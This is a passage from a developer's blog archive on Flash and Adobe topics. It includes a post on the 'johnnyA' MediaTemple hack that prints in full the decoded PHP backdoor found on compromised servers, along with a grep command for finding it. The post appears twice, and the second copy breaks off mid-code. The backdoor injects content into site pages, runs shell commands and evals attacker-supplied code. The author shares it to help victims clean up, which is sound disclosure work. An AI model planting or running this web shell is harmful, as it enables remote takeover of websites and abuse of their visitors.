Samsung Galaxy Tab with Flash Player 10.1
Now here is the first tablet that I’m actually excited about. The upcoming Samsung Galaxy Tab will run Android 2.2 (Froyo) and will ship with Flash Player 10.1. I recently switched to the Samsung Galaxy as my everyday phone and absolutely love it. The screen is gorgeous and I’m assuming this tablet will have one just as nice. Check out the commercial for the tablet below. This looks like it will ship relatively soon too.
Categories: Companies
Some Rest, Intel, FOTB, Lisbon, MAX and Latin America!
Things are going to be pretty unresponsive around here (more than usual) for the next week as I’m taking some time off to recharge the batteries. After I return things will be picking up rapidly as we enter the new conference season. Here are some upcoming things that are going on over the next few months. There is lots of exciting new stuff that I can’t wait to start talking about.
Intel Developer Forum · San Francisco · Sep 13 – 15
My first conference back will be the Intel Developer Forum taking place at Moscone Center in San Francisco. Adobe and Intel have partnered for the Melrose project that presents an excellent way for developers to monetize their AIR applications targeted at netbooks. I will be presenting on Adobe’s multi-screen vision.
Flash on the Beach · Brighton · Sep 26 – 29
I am really starting to get amped up for this year’s Flash on the Beach conference, which is arguably the world’s best. There is an interesting mix of speakers this year including several industry heavyweights. The Inspire sessions are probably my favorite part of this conference. Now don’t be a wanker. Go and register.
Flash Camp Portugal · Lisbon · Oct 2
This will be my first time in Portugal and I’m looking forward to hearing the difference between Brazilian Portuguese and the native version. Will essa porra even translate? The plans for this are still in the works but it will take place in Lisbon on October 2nd.
Adobe MAX · Los Angeles · Oct 23 – 27
MAX will be huge this year and I will be pretty busy. I’m doing a 90-minute BYOL session on building your first AIR for Android application. I will also be doing a slightly modified version of the My Head Hurts presentation that I did at FITC. I think it is a really informative session. Go and register for my sessions if they sound useful to you.
Latin Flash Tour · Latin America · Oct 30 – Nov 12
Yes were coming back for a second year bringing mayhem, cervezas, and some Flash stuff too. Check out the details on the official site. Details are still be worked out so be sure to check back. Mateo un ladron!
Categories: Companies
Demand for Flash Developers is Increasing
The Wall Street Journal recently put out an article describing how the demand for Flash developers has been increasing as of late. While this is no surprise to most of us in the community, it is a refreshing reminder that those who have marked Flash as a dying technology are quite wrong indeed. The article states that the increase in online Flash gaming is a large reason for the spike. I’m guessing that it also has something to do with all of the anticipation surrounding Flash on mobile devices.
The article also includes a quote about the salaries that top Flash developers are getting these days:
Top full-time Flash engineers can now command more than $150,000 a year in salary, says Stuart Liroff, a headhunter at GreeneSearch recruiting firm. That compares with $50,000 to $80,000 a year three years ago.
I’m sure a lot of you are now running to your bosses office to talk about getting a raise 
.
Categories: Companies
Idea for a Cool AIR Application
I often get ideas for things to build but don’t have the time to actually see them through. Recently I came across an API for accessing the Android Marketplace that was written in Java. Google has no official API for this as you are supposed to only be able to access it from your device. The idea was to build an AIR application that would allow you to search and browse on the market. There are many websites out there that do it but they are messy and riddled with ads. This would be clean, fast, and could include advanced features like directly connecting to your device.
I started by trying to port it directly to AS3. This was going great until I had to set a cookie header with the authentication details when querying the market. This is not allowed in ActionScript and I could find no workaround. A proxy on my web server could work but this is for an AIR application. Next I decided to simply call to the JAR file using the AIR 2.0 NativeProcess API. This worked great and I was able to get results returned. The issue then was that it seemed to be badly formed JSON. The JSON library in as3corelib kept giving me errors so that is where I left it.
If someone out there is looking for an idea for something to build, I think this would be a great app that would garner some attention. Make sure you send me the URL when you’re done. Below is the code I was using to interact with the JAR file.
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
private var np:NativeProcess;
private var npi:NativeProcessStartupInfo;
protected function windowedapplication1_creationCompleteHandler(event:FlexEvent):void
{
np = new NativeProcess();
npi = new NativeProcessStartupInfo();
npi.executable = File.applicationDirectory.resolvePath("C:/Windows/System32/java.exe");
var args:Vector.<String> = new Vector.<String>();
args.push("-jar");
args.push(File.applicationDirectory.resolvePath("androidmarketapi.jar").nativePath);
args.push("YOUR_GMAIL_ADDRESS_HERE");
args.push("YOUR_PASSWORD_HERE");
args.push("SEARCH_TERM");
npi.arguments = args;
np.addEventListener(ProgressEvent.STANDARD_OUTPUT_DATA, onData);
np.start(npi);
}
private function onData(e:ProgressEvent):void
{
var str:String = np.standardOutput.readUTFBytes(np.standardOutput.bytesAvailable);
if(str.indexOf("app") != -1)
{
str = str.substr(str.indexOf("app"));
var obj:Object = JSON.decode(str, false); //FAIL
}
}
Categories: Companies
Flash This – Not That!
Below is the first of a series of images depicting situations where you might want to use Flash along with those where you probably shouldn’t. They are based on the great Eat This – Not That! articles put out by Mens Health magazine. Now these are not hard and fast rules but instead just a general guide.
Look for more images in the series over the next couple of months. I won’t be using specific examples of sites that use Flash in questionable ways. If I did I would have to include several of my own previous sites .
Categories: Companies
Appropriate Uses for Flash
I am currently preparing for my session at FITC San Francisco where I will talk about all of the change that is currently happening in our industry. When I say industry I am not talking solely about Flash, but rather web development as a whole. The mobile explosion is providing us with lots of exciting new opportunities, but at the same time it is making things a whole lot more complicated. Moving forward, the mark of a true web professional will be knowing when it is appropriate to employ the power of Flash and when a different technology might be more appropriate. This means you will need to start educating yourself on these alternative technologies if you are not already doing so.
In reality, the situations where using Flash is appropriate have not changed all that much. What has changed is that we can no longer get away with misusing Flash anymore. I’m sure lots of us, myself included, have been guilty of that over the years. When people do this it actually hurts Flash as a technology and makes it much harder for us to convince people about its real benefits.
Flash has always been there to allow you to go beyond the functionality that the browser enables and this will continue to be the case. Video is a great example of this. Once all browsers can support HTML5 video it makes perfect sense for simple video playback to done outside of Flash. But if you want more advanced video features then you will choose Flash. On that note, we are working on some video stuff right now that will blow your mind. More details on that soon.
So why am I saying all this? Well I am planning on providing some tutorials and blog posts that focus on situations where using Flash might be a mistake. For instance, I am planning a tutorial showing how to do a basic photo slideshow using jQuery. Two photos fading into one another is a good example of where using Flash would be overkill. You will be much more successful in your career if you are someone who simply uses the best tool for the job. It’s really that simple. Sometimes that tool will be Flash and sometimes not.
If you want to hear more come to FITC San Francisco as it has the best lineup of speakers I have ever seen at one event. FITC is generously providing readers of this blog with a special $200 discount. Just use the discount code theflashblog when registering.
Categories: Companies
Introduction to OSMF Video Tutorial
I just uploaded a new tutorial that walks you through the basics of building a simple video player with OSMF. This framework makes it easy to build complex media players with features like HTTP streaming, DRM, ad integration, and more. This tutorial focuses on setting up your development environment and getting some video up and playing.
Categories: Companies
Details of the johnnyA MediaTemple Hack
Update: MediaTemple directed me to another blog post with additional details. This highlights another problem with this incident. The information has been spread all over the place. While this blog post does give some good details, it still does not provide cleanup instructions. It simply says that all malicious files have been removed. I’m sorry to say that they have not.
If you have websites hosted on a MediaTemple (gs) then you may have been a victim of this annoying redirect hack, unofficially known as the johnnyA hack. It was once thought to be an issue with WordPress, but in reality static sites are also affected by this. Essentially the attack works by including some encoded JavaScript onto your pages that tries to redirect you to a malicious website or file.
After much searching and with the help of this blog post, I have found the rootkit that is used to do the damage. If you have been hacked you will find some PHP files that were created by the attackers with a bunch of gzipped, base64-encoded source code. I converted that into the actual attack code which is listed below:
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
<?PHP
@ignore_user_abort(1);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@error_reporting(0);
@ini_set("memory_limit","16M");
if (!function_exists('rand_checkstr'))
{
function rand_checkstr()
{
$c5 = 1;
$c3 = 8;
$e7 ="";
for ($f3=0;$f3<$c3;$f3++) {
$c4 = mt_rand(1,7);
switch ($c4) {
case ($c4<=2):
$e7 .= mt_rand(0,9);
break;
case ($c4<=4):
$e7 .= chr(mt_rand(65,90));
break;
case ($c4<=6):
$e7 .= chr(mt_rand(97,122));
break;
case 7:
$e6 = strlen($e7);
if ($c5>0&&$e6>0&&$e6<($c3-1)&&$e7[$e6-1]!="_")
{
$e7 .= "_";
$c5--;
}
else
{
$f3--;
continue;
}
break;
}
}
return $e7;
}
}
if (!function_exists('strrevpos'))
{
function strrevpos($f4, $f6)
{
$f5 = strpos (strrev($f4), strrev($f6));
if ($f5===false)
return false;
else
return strlen($f4) - $f5 - strlen($f6);
}
}
if (!function_exists('after'))
{
function after ($this, $d8)
{
if (!is_bool(strpos($d8, $this)))
return substr($d8, strpos($d8,$this)+strlen($this));
}
}
if (!function_exists('after_last'))
{
function after_last ($this, $d8)
{
if (!is_bool(strrevpos($d8, $this)))
return substr($d8, strrevpos($d8, $this)+strlen($this));
}
}
if (!function_exists('before'))
{
function before ($this, $d8)
{
return substr($d8, 0, strpos($d8, $this));
}
}
if (!function_exists('before_last'))
{
function before_last ($this, $d8)
{
return substr($d8, 0, strrevpos($d8, $this));
}
}
if (!function_exists('between'))
{
function between ($this, $f7, $d8)
{
return before($f7, after($this, $d8));
}
}
if (!function_exists('between_last'))
{
function between_last ($this, $f7, $d8)
{
return after_last($this, before_last($f7, $d8));
}
}
if (!function_exists('stripslashes2'))
{
function stripslashes2($d3)
{
$d3 = str_replace('\\\\\\"', '\\"', $d3);
$d3 = str_replace("\\\'", "'", $d3);
$d3 = str_replace("\\\\\\\\", "\\\\", $d3);
return $d3;
}
}
if (!function_exists('getfiles'))
{
function getfiles($d4, $f1, $d5=0, $f8="\\")
{
if(!is_dir($d4))
{
return null;
}
$d9=($f8=="\\")?"/":$f8;
$d4=str_replace($f8,$d9,$d4);
$d4=str_replace("//",$d9,$d4);
$d4=(strrpos($d4, $d9)==strlen($d4)-1)? substr($d4, 0, strlen($d4)-1):$d4;
$e0=substr_count($d4, $d9);
$d5=(!$d5)?-1:$d5+$e0;
$e8=array();
$d7=array( array($d4, $e0) );
while(sizeof($d7) && $d7[0][1]!=$d5)
{
$d6=array_shift($d7);
$f9=opendir($d6[0]);
while( ($f0=readdir($f9))!==false )
{
if( strrpos($f0,".") === (strlen($f0)-1))
{
continue;
};
$f2=$d6[0].$d9.$f0;
if(is_dir($f2))
{
$e9[]=$f2;
$d7[]=array( $f2, substr_count($f2, $d9) );
}
else
{
foreach($f1 as $f3)
{
if(preg_match($f3,$f2))
{
$e8[]=$f2;break;};
}
};
};
}
return $e8;
}
}
if (!function_exists('checkcontent2'))
{
function checkcontent2($g0)
{
$e5 = array("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",
"Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.xx) Gecko/20030504 Mozilla Firebird/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5");
if (function_exists('curl_init'))
{
$g2 = $e5[rand(0,count($e5)-1)];
$g1 = curl_init();
curl_setopt($g1, CURLOPT_URL, $g0);
curl_setopt($g1, CURLOPT_HEADER, 0);
curl_setopt($g1, CURLOPT_TIMEOUT, 30);
curl_setopt($g1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($g1, CURLOPT_USERAGENT, $g2);
curl_setopt($g1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($g1, CURLOPT_MAXREDIRS, 2);
$g3 = curl_exec($g1);
curl_close($g1);
if ($g3 !== false)
{
return $g3;
}
}
else if (ini_get('allow_url_fopen') == '1')
{
$g3 = file_get_contents($g0);
if ($g3 !== false)
{
return $g3;
}
}
else
{
echo "<h5 style='color:maroon'>Can't download ".$g0." - EXIT;</h5>";
exit;
}
}
}
if (!function_exists('getcode'))
{
function getcode($g4,$d0)
{
$c8 = '';
if(preg_match("/$d0/",$g4))
{
$c8 = preg_replace("/.*<b1><!--|$d0|--><\/b1>.*/msi","",$g4);
}
return $c8;
}
}
$d1 = array("(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)");
$a7 = array("/<ad>.*<\/ad>/si",
"/<ads>.*<\/ads>/si",
"/<bb1>.*<bb2>/si",
"/<b1>.*<\/b1>/si",
"/<bb1><bb1>/si",
"/<bb2><bb2>/si",
"/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/wpfooterz.*wpfooterz/si", "/<a.*style\s*=.*(top|left)\s*:\s*-[0-9]{3,5}.*>.*<\/a>/Ui",
"/<a.*(viagra|cialis|phentermine|vioxx|hydrocodon|oxycontin|levitra|ambien|xanax|adipex|cheap pills|paxil|Codeine|vicodin|tramadol|tadalafil|carisoprodol|mesothelioma|lorazepam|propecia|protonix|prozac|prescription|buy cheap|zithromax)+.*><\/a>/i");
if (isset($_REQUEST['update1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['update1'])));
$b0 = $b4[0];
$b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
if (strlen($b0) > 1)
$b0 = "<ads>".$b0."</ads>";
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$b7 = false;
if (eregi(".htm",$a3) !== false || eregi(".shtm",$a3) !== false)
$b7 = true;
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
else if ($b7 == true)
{
$a0=$b0."</body></html>";
$a1.=$a0;
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w+");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
if ($a2 == true)
echo "<pre>update $a3</pre>";
if ($a5 == true)
echo "<pre>spam removed $a3</pre>";
}
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no rw file $a3</pre>";
}
}
}
if (isset($_REQUEST['update2']))
{
$b0 = gzinflate(base64_decode($_REQUEST['update2']));
$a6 = $_SERVER['SCRIPT_FILENAME'];
$b6 = before_last('/',$a6);
if (!is_writable($b6))
@chmod($b6, 0644);
$b8 = @filemtime($b6);
@copy($a6,$a6.'1.php');
@touch($b6,$b8,$b8);
@touch($a6.'1.php',$b8,$b8);
if (!is_writable($a6))
@chmod($a6, 0644);
if (is_writable($a6))
{
$a1 = trim(file_get_contents($a6));
$b3 = preg_replace('/^\<\?php.*\?\>/Usi','',$a1);
$a4 = @filemtime($a6);
$b1 = fopen($a6, "w");
fwrite($b1, $b0.$b3);
fclose($b1);
@touch($a6,$a4,$a4);
echo "<pre>update</pre>";
}
else
{
echo "<pre>no rw $a3</pre>";
}
}
if (isset($_REQUEST['update3']))
{
echo "<pre>";
$a8 = $_REQUEST['update3'];
$b4 = '';
if (!empty($a8))
{
if(function_exists('exec'))
{
@exec($a8,$b4);
$b4 = join("\n",$b4);
}
elseif(function_exists('shell_exec'))
{
$b4 = @shell_exec($a8);
}
elseif(function_exists('system'))
{
@ob_start();
@system($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($b2 = @popen($a8,"r")))
{
$b4 = "";
while(!@feof($b2))
{
$b4 .= @fread($b2,1024);
}
@pclose($b2);
}
}
echo $b4;
echo "</pre>";
}
if (isset($_REQUEST['add1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['add1'])));
$b0 = $b4[0]; $b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
$a1 = preg_replace("/var\sst1(.*)gr0\=0\;/i", "", $a1);
$a1=$b0.$a1;
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
echo "<pre>update $a3</pre>";
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no w file $a3</pre>";
}
}
}
if (isset($_REQUEST["ev1"]))
{
$b9=base64_decode($_REQUEST["ev1"]);
if (isset($_REQUEST["s"]))
{
$b9=stripslashes2($b9);
};
eval($b9);
exit();
}
if (isset($_REQUEST["info1"]))
{
$c0 = 'dGVzdDEyNw==';
$c1 = @get_current_user();
echo "<!--".base64_decode($c0)."(($c1))-->";
exit;
}
if (isset($_REQUEST["get1"]))
{
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get1']) : $c6 = $_REQUEST['get1'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$d0 = rand_checkstr();
$e1 = array("((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\.|^auth.*\.|^.*footer.*\.|^home.*\.|^.*templ.*\.|^inc.*\.|^page.*\.|^hyperseek.*\.|^Output.*\.|^comment.*\.|^uifunctions.*\.|^bottom.*\.|^infocus.*\.)(ph.*$|htm.*$|shtm.*$|asp.*$|jsp$|jhtml$|cfm$|tpl$|inc$|pl$|templ.*$|xml$|sht$|ctp$))");
$b5 = getfiles($d2, $e1, 4);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$e2 = base64_encode(gzcompress($a3,9));
$b0 ="<b1><!--".$d0.$e2."--></b1>";
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
$c9 = checkcontent2($c6);
if (eregi($d0, $c9))
{
$c9 = gzuncompress(base64_decode(getcode($c9,$d0)));
echo $c9;
}
foreach($b5 as $a3)
{
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if ($a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
exit;
}
if (isset($_REQUEST["get2"]))
{
$e3 = array();
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get2']) : $c6 = $_REQUEST['get2'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$c7 = checkcontent2($c6);
$c6 = preg_replace("/^www\./i", "", $c6);
preg_match_all("/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", $c7,$c8);
foreach ($c8[2] as $e4)
{
if (preg_match('/^http/i',$e4))
{
if (preg_match("/$c6/i",$e4))
{
$b2 = $d2.after($c6,$e4);
if (file_exists($b2))
$e3[] = $b2;
}
}
else
{
$b2 = $d2.'/'.$e4;
if (file_exists($b2))
$e3[] = $b2;
}
}
echo ($e3[rand(0,count($e3)-1)]);
exit;
}
?>
It looks like the attackers simply visit this PHP page and pass in some request parameters to tailor the attack. It looks like there are a few different options such as generating files, executing shell code, etc. I’m no PHP wizard so let me know if you find something interesting.
So how do you find these PHP files? Just SSH into your root directory and run:
1grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *
This will list all files that have a string that is longer than 255 characters. This should help you locate these files.
My big question is for MediaTemple. What the hell are you guys doing? Why are we having to dig around for this information? Surely you have determined the same things so why are you not telling people how to clean it up? This official blog post from MediaTemple is vague and tells us nothing about how to actually clean our servers up. Do your job!
Categories: Companies
Details of the johnnyA MediaTemple Hack
Update: MediaTemple directed me to another blog post with additional details. This highlights another problem with this incident. The information has been spread all over the place. While this blog post does give some good details, it still does not provide cleanup instructions. It simply says that all malicious files have been removed. I’m sorry to say that they have not.
If you have websites hosted on a MediaTemple (gs) then you may have been a victim of this annoying redirect hack, unofficially known as the johnnyA hack. It was once thought to be an issue with WordPress, but in reality static sites are also affected by this. Essentially the attack works by including some encoded JavaScript onto your pages that tries to redirect you to a malicious website or file.
After much searching and with the help of this blog post, I have found the rootkit that is used to do the damage. If you have been hacked you will find some PHP files that were created by the attackers with a bunch of gzipped, base64-encoded source code. I converted that into the actual attack code which is listed below:
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
<?PHP
@ignore_user_abort(1);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@error_reporting(0);
@ini_set("memory_limit","16M");
if (!function_exists('rand_checkstr'))
{
function rand_checkstr()
{
$c5 = 1;
$c3 = 8;
$e7 ="";
for ($f3=0;$f3<$c3;$f3++) {
$c4 = mt_rand(1,7);
switch ($c4) {
case ($c4<=2):
$e7 .= mt_rand(0,9);
break;
case ($c4<=4):
$e7 .= chr(mt_rand(65,90));
break;
case ($c4<=6):
$e7 .= chr(mt_rand(97,122));
break;
case 7:
$e6 = strlen($e7);
if ($c5>0&&$e6>0&&$e6<($c3-1)&&$e7[$e6-1]!="_")
{
$e7 .= "_";
$c5--;
}
else
{
$f3--;
continue;
}
break;
}
}
return $e7;
}
}
if (!function_exists('strrevpos'))
{
function strrevpos($f4, $f6)
{
$f5 = strpos (strrev($f4), strrev($f6));
if ($f5===false)
return false;
else
return strlen($f4) - $f5 - strlen($f6);
}
}
if (!function_exists('after'))
{
function after ($this, $d8)
{
if (!is_bool(strpos($d8, $this)))
return substr($d8, strpos($d8,$this)+strlen($this));
}
}
if (!function_exists('after_last'))
{
function after_last ($this, $d8)
{
if (!is_bool(strrevpos($d8, $this)))
return substr($d8, strrevpos($d8, $this)+strlen($this));
}
}
if (!function_exists('before'))
{
function before ($this, $d8)
{
return substr($d8, 0, strpos($d8, $this));
}
}
if (!function_exists('before_last'))
{
function before_last ($this, $d8)
{
return substr($d8, 0, strrevpos($d8, $this));
}
}
if (!function_exists('between'))
{
function between ($this, $f7, $d8)
{
return before($f7, after($this, $d8));
}
}
if (!function_exists('between_last'))
{
function between_last ($this, $f7, $d8)
{
return after_last($this, before_last($f7, $d8));
}
}
if (!function_exists('stripslashes2'))
{
function stripslashes2($d3)
{
$d3 = str_replace('\\\\\\"', '\\"', $d3);
$d3 = str_replace("\\\'", "'", $d3);
$d3 = str_replace("\\\\\\\\", "\\\\", $d3);
return $d3;
}
}
if (!function_exists('getfiles'))
{
function getfiles($d4, $f1, $d5=0, $f8="\\")
{
if(!is_dir($d4))
{
return null;
}
$d9=($f8=="\\")?"/":$f8;
$d4=str_replace($f8,$d9,$d4);
$d4=str_replace("//",$d9,$d4);
$d4=(strrpos($d4, $d9)==strlen($d4)-1)? substr($d4, 0, strlen($d4)-1):$d4;
$e0=substr_count($d4, $d9);
$d5=(!$d5)?-1:$d5+$e0;
$e8=array();
$d7=array( array($d4, $e0) );
while(sizeof($d7) && $d7[0][1]!=$d5)
{
$d6=array_shift($d7);
$f9=opendir($d6[0]);
while( ($f0=readdir($f9))!==false )
{
if( strrpos($f0,".") === (strlen($f0)-1))
{
continue;
};
$f2=$d6[0].$d9.$f0;
if(is_dir($f2))
{
$e9[]=$f2;
